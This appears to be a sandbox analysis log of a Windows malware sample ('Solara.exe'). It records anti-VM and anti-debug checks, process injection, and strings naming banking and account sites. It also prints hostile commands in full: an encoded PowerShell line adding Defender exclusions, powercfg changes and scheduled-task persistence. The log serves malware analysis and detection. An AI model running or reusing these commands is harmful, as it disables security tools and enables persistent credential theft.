Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -598836s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -598732s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe TID: 7328	Thread sleep time: -598405s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5380	Thread sleep count: 7032 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4912	Thread sleep count: 2662 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 564	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7656	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0094FCDE FindFirstFileExW,	0_2_0094FCDE
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0094FD8F
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0094FCDE FindFirstFileExW,	2_2_0094FCDE
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0094FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_0094FD8F

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599206	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598836	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Thread delayed: delay time: 598405	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Solara.exe.bin.exe, 00000002.00000003.945226167.0000000003628000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Z6T9189FJQPDA5HSM49.exe.2.dr	Binary or memory string: Vmwaretrat
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Z6T9189FJQPDA5HSM49.exe.2.dr	Binary or memory string: vboxservice
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Solara.exe.bin.exe, 00000002.00000003.996006601.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636710927.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2171484979.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.930667144.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000002.2172252845.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.974203654.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636739565.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2173131503.000001B3CC62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2175447695.000001B3D1C5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Z6T9189FJQPDA5HSM49.exe.2.dr	Binary or memory string: Vmwareuser
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1091052476.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000002.1093031498.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr	Binary or memory string: vboxtray
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Solara.exe.bin.exe, 00000002.00000003.945342853.000000000361B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Z6T9189FJQPDA5HSM49.exe.2.dr	Binary or memory string: Vmtoolsd
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_008D553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_008D553B

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0093DC9E

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_009661B4 mov edi, dword ptr fs:[00000030h]

0_2_009661B4

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_0094B71C GetProcessHeap,

0_2_0094B71C

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0093D8E2
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093DC92 SetUnhandledExceptionFilter,	0_2_0093DC92
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0093DC9E
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 0_2_00945DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00945DCE
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0093D8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0093D8E2
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_0093DC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0093DC9E
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 2_2_00945DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00945DCE

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Code function: 0_2_009661B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_009661B4

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#BosBZwmO#> Add-MpPreference <#RRSWq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#HAoEWcB#> -Force <#wjh0wv#>
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#BosBZwmO#> Add-MpPreference <#RRSWq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#HAoEWcB#> -Force <#wjh0wv#>			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Solara.exe.bin.exe

Memory written: C:\Users\user\Desktop\Solara.exe.bin.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Process created: C:\Users\user\Desktop\Solara.exe.bin.exe "C:\Users\user\Desktop\Solara.exe.bin.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAbwBzAEIAWgB3AG0ATwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFIAUgBTAFcAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBIAEEAbwBFAFcAYwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagBoADAAdwB2ACMAPgA="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1998" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga="
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaeiabwbzaeiawgb3ag0atwajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafiaugbtafcacqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbiaeeabwbfafcaywbcacmapgagac0argbvahiaywblacaapaajahcaagboadaadwb2acmapga="	Jump to behavior

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	0_2_0094B007
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0094F048
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	0_2_0094F299
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0094F334
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	0_2_0094F587
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	0_2_0094F5E6
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	0_2_0094F6BB
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0094F7AD
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	0_2_0094F706
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	0_2_0094F8B3
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	0_2_0094AB0C
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	2_2_0094F8B3
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	2_2_0094B007
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0094F048
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	2_2_0094F299
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	2_2_0094AB0C
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_0094F334
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	2_2_0094F587
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	2_2_0094F5E6
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: EnumSystemLocalesW,	2_2_0094F6BB
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0094F7AD
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: GetLocaleInfoW,	2_2_0094F706

Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
